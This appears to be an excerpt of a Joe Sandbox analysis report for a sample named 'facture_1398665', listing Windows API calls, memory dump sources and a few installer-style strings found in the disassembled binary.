    • SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004617E5
      • Part of subcall function 0046163C: BeginPaint.USER32(00000000,?), ref: 004616A8
      • Part of subcall function 0046163C: EndPaint.USER32(00000000,?), ref: 0046176A
    • BitBlt.GDI32(00000000,?,?,?,?,?,?,?,00CC0020), ref: 00461833
    • SelectObject.GDI32(?,004458CE), ref: 0046184D
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0046163C: BeginPaint.USER32(00000000,?), ref: 004616A8
      • Part of subcall function 0046163C: EndPaint.USER32(00000000,?), ref: 0046176A
      • Part of subcall function 0046163C: BeginPaint.USER32(00000000,?), ref: 00461784
      • Part of subcall function 0046163C: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0046179A
      • Part of subcall function 0046163C: CreateCompatibleDC.GDI32(00000000), ref: 004617B1
      • Part of subcall function 0046163C: SelectObject.GDI32(?,?), ref: 004617C1
      • Part of subcall function 0046163C: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004617E5
      • Part of subcall function 0046163C: BitBlt.GDI32(00000000,?,?,?,?,?,?,?,00CC0020), ref: 00461833
      • Part of subcall function 0046163C: SelectObject.GDI32(?,004458CE), ref: 0046184D
      • Part of subcall function 00431848: InitializeCriticalSection.KERNEL32(00433F14,00433ED8,00000000,00000001,0043406E,00000000,?,00000000,00435659), ref: 00431868
      • Part of subcall function 00431F18: FrameRect.USER32(?,?,00000000), ref: 00431F41
    • InflateRect.USER32(?,000000FF,000000FF), ref: 0044592D
    • InflateRect.USER32(?,000000FF,000000FF), ref: 0044599D
    • GetWindowLongW.USER32(00000000,000000F0), ref: 004459C2
    • GetSystemMetrics.USER32(00000014), ref: 004459F7
    • GetSystemMetrics.USER32(00000015), ref: 00445A15
    • DrawEdge.USER32(00000000,?,00000000,00000008), ref: 00445A7A
    • GetSystemMetrics.USER32(0000000A), ref: 00445A81
      • Part of subcall function 00443CE8: SendMessageW.USER32(00000000,00000157,00000000,00000000), ref: 00443CFC
    • DrawFrameControl.USER32(00000000,?,00000003,00004005), ref: 00445AB6
    • DrawFrameControl.USER32(00000000,?,00000003,00004005), ref: 00445AD1
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • MulDiv.KERNEL32(?,?,?), ref: 0045AD33
    • MulDiv.KERNEL32(?,?,?), ref: 0045AD4D
    • MulDiv.KERNEL32(?,?,?), ref: 0045AD7B
    • MulDiv.KERNEL32(?,?,?), ref: 0045AD91
    • MulDiv.KERNEL32(?,?,?), ref: 0045ADBF
    • MulDiv.KERNEL32(?,?,?), ref: 0045ADD7
      • Part of subcall function 0045AB18: MulDiv.KERNEL32(?), ref: 0045AB2D
      • Part of subcall function 0045AB18: MulDiv.KERNEL32(?), ref: 0045AB4A
      • Part of subcall function 0045AB18: MulDiv.KERNEL32(?), ref: 0045AB67
      • Part of subcall function 0045AB18: MulDiv.KERNEL32(?), ref: 0045AB84
      • Part of subcall function 0045AB9C: MulDiv.KERNEL32(?), ref: 0045ABB1
      • Part of subcall function 0045AB9C: MulDiv.KERNEL32(?), ref: 0045ABCB
      • Part of subcall function 0045AB9C: MulDiv.KERNEL32(?), ref: 0045ABE8
      • Part of subcall function 0045AB9C: MulDiv.KERNEL32(?), ref: 0045AC05
    • MulDiv.KERNEL32(?), ref: 0045AE3A
    • MulDiv.KERNEL32(?), ref: 0045AE64
      • Part of subcall function 004310BC: MulDiv.KERNEL32(00000000,00000048,?), ref: 004310CD
    • MulDiv.KERNEL32(00000000), ref: 0045AE8A
      • Part of subcall function 004310D8: MulDiv.KERNEL32(00000000,?,00000048), ref: 004310E5
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047F740: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0047F753
      • Part of subcall function 004AD01C: CreateProcessW.KERNEL32(00000000,00000000,?,?,?,004B3204,00000000,1K,?,?), ref: 004AD070
      • Part of subcall function 004AD01C: GetLastError.KERNEL32(00000000,004AD096,?,?,?,00000001), ref: 004AD078
    • CloseHandle.KERNEL32(?), ref: 004B3172
      • Part of subcall function 004B2F50: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004B2F82
      • Part of subcall function 004B2F50: GetExitCodeProcess.KERNEL32(?,?), ref: 004B2FA5
      • Part of subcall function 004B2F50: CloseHandle.KERNEL32(?), ref: 004B2FCB
      • Part of subcall function 004ADC34: GetLastError.KERNEL32(00000000,004AE8EE,00000005,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000,004FE286), ref: 004ADC37
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetDesktopWindow.USER32 ref: 0045BD87
    • GetDCEx.USER32(?,00000000,00000402), ref: 0045BD9A
      • Part of subcall function 0043170C: CreateBrushIndirect.GDI32(?), ref: 004317B7
    • SelectObject.GDI32(?,00000000), ref: 0045BDBD
    • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0045BDE3
    • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0045BE05
    • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0045BE24
    • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0045BE3E
    • SelectObject.GDI32(?,?), ref: 0045BE4B
    • ReleaseDC.USER32(?,?), ref: 0045BE65
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SystemParametersInfoW.USER32(0000001F,0000005C,?,00000000), ref: 00479DE6
    • CreateFontIndirectW.GDI32(0000001F), ref: 00479DF3
    • GetStockObject.GDI32(0000000D), ref: 00479E06
    • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00479E2D
    • CreateFontIndirectW.GDI32(?), ref: 00479E3D
    • CreateFontIndirectW.GDI32(?), ref: 00479E53
    • CreateFontIndirectW.GDI32(?), ref: 00479E6C
      • Part of subcall function 004310D8: MulDiv.KERNEL32(00000000,?,00000048), ref: 004310E5
    • GetStockObject.GDI32(0000000D), ref: 00479E8F
    • GetStockObject.GDI32(0000000D), ref: 00479EA3
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00412ED8: GetThreadLocale.KERNEL32 ref: 00412EFA
      • Part of subcall function 00412ED8: GetSystemMetrics.USER32(0000004A), ref: 00412F4B
      • Part of subcall function 00411074: GetThreadLocale.KERNEL32(00000000,00411187,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00411090
    • GetThreadLocale.KERNEL32(00000000,0041326E,?,?,00000000,00000000), ref: 00412FC6
      • Part of subcall function 00410FC0: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00410FDE
      • Part of subcall function 0041100C: GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00413044,00000000,0041326E,?,?,00000000,00000000), ref: 0041101F
      • Part of subcall function 00411300: GetThreadLocale.KERNEL32(?,00000000,00411533,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041133B
      • Part of subcall function 0041124C: GetThreadLocale.KERNEL32(?,00000000,004112E3,?,?,00000000), ref: 00411264
      • Part of subcall function 0041124C: GetThreadLocale.KERNEL32(00000000,00000004,00000000,004112E3,?,?,00000000), ref: 00411294
      • Part of subcall function 0041124C: EnumCalendarInfoW.KERNEL32(Function_00011198,00000000,00000000,00000004,00000000,004112E3,?,?,00000000), ref: 0041129F
      • Part of subcall function 0041124C: GetThreadLocale.KERNEL32(00000000,00000003,Function_00011198,00000000,00000000,00000004,00000000,004112E3,?,?,00000000), ref: 004112BD
      • Part of subcall function 0041124C: EnumCalendarInfoW.KERNEL32(Function_000111D4,00000000,00000000,00000003,Function_00011198,00000000,00000000,00000004,00000000,004112E3,?,?,00000000), ref: 004112C8
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00416A7D
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00416A99
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00416AD2
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00416B4F
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00416B68
    • VariantCopy.OLEAUT32(?), ref: 00416B9D
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetCurrentThreadId.KERNEL32 ref: 0042A36F
    • GetCurrentThreadId.KERNEL32 ref: 0042A37E
    • EnterCriticalSection.KERNEL32(0050AE80,0042A4D0,0050AE80,00000000,0042A527,?,00502EC8,?,00000000,0042A546,?,0050AE80), ref: 0042A4C3
      • Part of subcall function 0042A324: WaitForSingleObject.KERNEL32(000000A8), ref: 0042A32E
      • Part of subcall function 0042A318: ResetEvent.KERNEL32(000000A8,0042A3B9), ref: 0042A31E
    • EnterCriticalSection.KERNEL32(0050AE80), ref: 0042A3C3
    • InterlockedExchange.KERNEL32(00502EC8,?), ref: 0042A3DF
    • LeaveCriticalSection.KERNEL32(0050AE80,00000000,0042A527,?,00502EC8,?,00000000,0042A546,?,0050AE80), ref: 0042A438
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,?,?,00000002,00000000,00000000,004CED2B), ref: 004CEC8F
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,?,?,00000002,00000000,00000000,004CED2B), ref: 004CECA6
    • AddFontResourceW.GDI32(00000000), ref: 004CECC3
    • SendNotifyMessageW.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004CECD7
    Strings
    • Failed to set value in Fonts registry key., xrefs: 004CEC98
    • AddFontResource, xrefs: 004CECE1
    • Failed to open Fonts registry key., xrefs: 004CECAD
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetMonitorInfoA.USER32(?,?), ref: 0042DD55
    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0042DD7C
    • GetSystemMetrics.USER32(00000000), ref: 0042DD91
    • GetSystemMetrics.USER32(00000001), ref: 0042DD9C
    • lstrcpyW.KERNEL32(?,DISPLAY), ref: 0042DDC6
      • Part of subcall function 0042D96C: GetProcAddress.KERNEL32(766C0000,00000000,00000000,0042DA4E), ref: 0042DA08
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000), ref: 0040502D
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?), ref: 00405033
    • GetStdHandle.KERNEL32(000000F5,00405080,00000002,?,00000000,00000000,?,004050A5,?,?,?,00000002,004051BA,00403127,0040316E,?), ref: 00405048
    • WriteFile.KERNEL32(00000000,000000F5,00405080,00000002,?), ref: 0040504E
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 0040506C
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00401870: Sleep.KERNEL32(00000000,004018F3,00000000,?,00101000,00000004,?,?,?,?,004023AC), ref: 00401886
      • Part of subcall function 00401870: Sleep.KERNEL32(0000000A,00000000,004018F3,00000000,?,00101000,00000004,?,?,?,?,004023AC), ref: 0040189F
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040194B
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040196E
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 0040197B
    • Sleep.KERNEL32(00000000,?), ref: 00401F26
    • Sleep.KERNEL32(0000000A,00000000,?), ref: 00401F40
    • Sleep.KERNEL32(00000000), ref: 00401F68
    • Sleep.KERNEL32(0000000A,00000000), ref: 00401F7E
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00402038
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • ImageList_DrawEx.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 0046C31B
      • Part of subcall function 00431E8C: FillRect.USER32(?,?,00000000), ref: 00431EB5
    • ImageList_DrawEx.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,?,?), ref: 0046C3BC
    • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0046C409
    • SetBkColor.GDI32(00000000,00000000), ref: 0046C411
    • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 0046C436
    • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0046C457
    • SetBkColor.GDI32(00000000,00000000), ref: 0046C45F
    • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 0046C482
      • Part of subcall function 0046C294: ImageList_GetBkColor.COMCTL32(00000000,?,0046C2F5,00000000,?), ref: 0046C2AA
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004AD314: GetFileAttributesW.KERNEL32(00000000,00000000,004AD373,?,?), ref: 004AD34D
      • Part of subcall function 004AD314: GetLastError.KERNEL32(00000000,00000000,004AD373,?,?), ref: 004AD355
      • Part of subcall function 004AD6C0: SetFileAttributesW.KERNEL32(00000000,?,00000000,004AD721,?,?,?,?), ref: 004AD6FB
      • Part of subcall function 004AD6C0: GetLastError.KERNEL32(00000000,?,00000000,004AD721,?,?,?,?), ref: 004AD703
      • Part of subcall function 004AECF0: FindNextFileW.KERNEL32(000000FF,00000010), ref: 004AEDAC
      • Part of subcall function 004AECF0: GetLastError.KERNEL32(000000FF,00000010), ref: 004AEDB5
      • Part of subcall function 004AECF0: FindClose.KERNEL32(000000FF,004AEDE5), ref: 004AEDD4
      • Part of subcall function 004AD648: RemoveDirectoryW.KERNEL32(00000000,00000000,004AD6A5,?,?,00000000), ref: 004AD67F
      • Part of subcall function 004AD648: GetLastError.KERNEL32(00000000,00000000,004AD6A5,?,?,00000000), ref: 004AD687
    • GetLastError.KERNEL32(00000000,004B576C,?,00000000,?), ref: 004B56AE
      • Part of subcall function 004B54FC: GetLastError.KERNEL32(00000004,00000000,004B559E), ref: 004B5568
    Strings
    • Stripped read-only attribute., xrefs: 004B5670
    • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004B5688
    • Failed to strip read-only attribute., xrefs: 004B567C
    • Deleting directory: %s, xrefs: 004B5637
    • Failed to delete directory (%d)., xrefs: 004B5746
    • Failed to delete directory (%d). Will retry later., xrefs: 004B56C7
    • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 004B5725
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetCapture.USER32 ref: 0047C042
    • GetParent.USER32(00000000), ref: 0047C068
    • IsWindowUnicode.USER32(00000000), ref: 0047C085
    • SendMessageW.USER32(00000000,-0000BBEE,01484140,?), ref: 0047C0A0
    • SendMessageA.USER32(00000000,-0000BBEE,01484140,?), ref: 0047C0BF
    • GetWindowThreadProcessId.USER32(00000000), ref: 0047C0CE
    • GetWindowThreadProcessId.USER32(?,?), ref: 0047C0DF
    • SendMessageW.USER32(00000000,-0000BBEE,01484140,?), ref: 0047C0FF
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetDC.USER32(00000000), ref: 00432EC2
    • GetDeviceCaps.GDI32(?,00000068), ref: 00432EDE
    • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00432EFD
    • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 00432F21
    • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 00432F3F
    • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 00432F53
    • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00432F73
    • ReleaseDC.USER32(00000000,?), ref: 00432F8B
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00401A0C
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004), ref: 00401A55
    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000004), ref: 00401A6B
      • Part of subcall function 00401B0C: VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,004023AC), ref: 004018D8
      • Part of subcall function 00401B0C: Sleep.KERNEL32(00000000,?,004023AC), ref: 00401BC3
      • Part of subcall function 00401B0C: Sleep.KERNEL32(0000000A,00000000,?,004023AC), ref: 00401BD9
      • Part of subcall function 00401B0C: Sleep.KERNEL32(00000000,?,?,?,004023AC), ref: 00401C07
      • Part of subcall function 00401B0C: Sleep.KERNEL32(0000000A,00000000,?,?,?,004023AC), ref: 00401C1D
      • Part of subcall function 00401B0C: Sleep.KERNEL32(00000000,?,004023AC), ref: 00401D4C
      • Part of subcall function 00401B0C: Sleep.KERNEL32(0000000A,00000000,?,004023AC), ref: 00401D62
      • Part of subcall function 00401E90: VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040194B
      • Part of subcall function 00401E90: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040196E
      • Part of subcall function 00401E90: VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 0040197B
      • Part of subcall function 00401E90: Sleep.KERNEL32(00000000,?), ref: 00401F26
      • Part of subcall function 00401E90: Sleep.KERNEL32(0000000A,00000000,?), ref: 00401F40
      • Part of subcall function 00401E90: Sleep.KERNEL32(00000000), ref: 00401F68
      • Part of subcall function 00401E90: Sleep.KERNEL32(0000000A,00000000), ref: 00401F7E
      • Part of subcall function 00401E90: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00402038
    • Sleep.KERNEL32(00000000,?), ref: 004021A7
    • Sleep.KERNEL32(0000000A,00000000,?), ref: 004021BF
    • Sleep.KERNEL32(00000000,?,?), ref: 00402290
    • Sleep.KERNEL32(0000000A,00000000,?,?), ref: 004022AA
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00460364: SetParent.USER32(00000000,?), ref: 004603BA
